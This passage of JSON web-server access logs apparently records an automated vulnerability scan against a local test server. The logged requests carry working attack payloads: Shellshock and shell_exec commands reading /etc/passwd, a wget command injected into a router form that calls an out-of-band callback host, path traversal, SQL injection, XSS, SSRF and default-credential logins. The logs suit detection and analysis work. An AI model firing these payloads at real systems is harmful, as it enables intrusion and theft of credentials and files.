Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /inormalydonotexist HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /FileZilla.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"module1=wifiBasicCfg&doubleBandUnityEnable=false&wifiTotalEn=true&wifiEn=true&wifiSSID=Tenda_B0E040&mac=wget+http://ca2tuc8smpv1g2s80ca0g7hp1hjxy67rg.oast.pro&wifiSecurityMode=WPAWPA2%2FAES&wifiPwd=Password12345&wifiHideSSID=false&wifiEn_5G=true&wifiSSID_5G=Tenda_B0E040_5G&wifiSecurityMode_5G=WPAWPA2%2FAES&wifiPwd_5G=Password12345&wifiHideSSID_5G=false&module2=wifiGuest&guestEn=false&guestEn_5G=false&guestSSID=Tenda_VIP&guestSSID_5G=Tenda_VIP_5G&guestPwd=&guestPwd_5G=&guestValidTime=8&guestShareSpeed=0&module3=wifiPower&wifiPower=high&wifiPower_5G=high&module5=wifiAdvCfg&wifiMode=bgn&wifiChannel=auto&wifiBandwidth=auto&wifiMode_5G=ac&wifiChannel_5G=auto&wifiBandwidth_5G=auto&wifiAntijamEn=false&module6=wifiBeamforming&wifiBeaformingEn=true&module7=wifiWPS&wpsEn=true&wanType=static","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /goform/setmac HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1/index.htmlr", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi/cal?year=2021%3C/title%3E%3Cscript%3Ealert(%2729N5Ejz8SbuT5g0EsvmbK4dvQNn%27)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:/%5C/%5Cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/mstrWeb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apc/apc.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_admin/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /resin-doc/viewfile/?file=index.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"{\x0D\x0A \x22type\x22:\x22bulk\x22,\x0D\x0A \x22args\x22:[\x0D\x0A {\x0D\x0A \x22type\x22:\x22add_remote_schema\x22,\x0D\x0A \x22args\x22:{\x0D\x0A \x22name\x22:\x22test\x22,\x0D\x0A \x22definition\x22:{\x0D\x0A \x22url\x22:\x22https://ca2tuc8smpv1g2s80ca0fw6tr95ww5m3s.oast.pro\x22,\x0D\x0A \x22headers\x22:[\x0D\x0A ],\x0D\x0A \x22timeout_seconds\x22:60,\x0D\x0A \x22forward_client_headers\x22:true\x0D\x0A }\x0D\x0A }\x0D\x0A }\x0D\x0A ]\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/query HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /metrics/v1/mbeans HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?{alert(1)} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/env HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"TRACE / HTTP/1.1","status":"405","body_bytes_sents":"556","req_time":"0.000","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"TRACE", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/database/selector/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-----------------------------20873900192357278038549710136\x0D\x0AContent-Disposition: form-data; name=\x22file1\x22; filename=\x22poc.aspx\x22\x0D\x0AContent-Type: image/jpeg\x0D\x0A\x0D\x0A29N5Ei20gLhT5R7hMVXx13RaKkG\x0D\x0A-----------------------------20873900192357278038549710136--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /upload/UploadResourcePic.ashx?ResourceID=8382 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /application/logs/application.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /myaccount/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"type=url&data=http%3A%2F%2Fca2tuc8smpv1g2s80ca0xrjwj7mxu9476.oast.pro%2F&xmlaction=preview&node=0","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php?action=moove_read_xml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /app/welcome/default/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?s=/install/index/index HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:/%5Cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apc.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"content1=&button=%E6%8F%90%E4%BA%A4%E5%86%85%E5%AE%B9","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /kindeditor/php/demo.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%2f/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/nodes HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?wsdl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/GetSrc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"OPTIONS / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"OPTIONS", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/sso/v2/sso/jwt?error_url=http://evil.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"USERNAME=student&PASSWORD=student@123&language=en&log=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /application/logs/default.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:18 +0000","request_body":"username=admin&password=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /htdocs/login/login.lua HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /camunda/app/welcome/default/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:18 +0000","request_body":"{\x22params\x22:\x22w=123\x5C\x22'1234123'\x5C\x22|cat /etc/passwd\x22}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/dzs-zoomsounds/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /whoAmI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:18 +0000","request_body":"content1=&button=%E6%8F%90%E4%BA%A4%E5%86%85%E5%AE%B9","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /php/demo.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sample-apps/hello/%2f/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /portal/info.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webui/?g=sys_dia_data_down&file_name=../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/GetDevice HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) 